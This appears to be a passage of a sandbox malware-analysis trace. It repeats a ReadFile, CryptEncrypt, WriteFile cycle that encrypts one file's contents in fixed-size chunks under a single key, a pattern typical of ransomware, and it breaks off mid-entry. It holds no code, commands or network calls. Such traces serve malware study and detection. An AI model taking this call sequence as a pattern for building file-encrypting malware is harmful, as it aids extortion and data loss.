[0261.508] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.508] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.508] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.509] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.509] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.509] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.509] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.509] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.509] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.510] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.510] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.510] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.510] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.510] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.510] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.510] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.510] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.510] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.510] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.510] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.510] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.510] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.510] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.511] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.511] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.512] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.512] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.512] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.512] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.512] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.512] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.512] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.512] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.512] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.512] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.512] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.512] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.512] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.513] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.513] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.513] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.513] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.513] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.513] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.513] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.513] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.513] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.513] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.513] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.514] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.514] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] CryptEncrypt (in: hKey=0x2e7df40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.515] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.515] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, 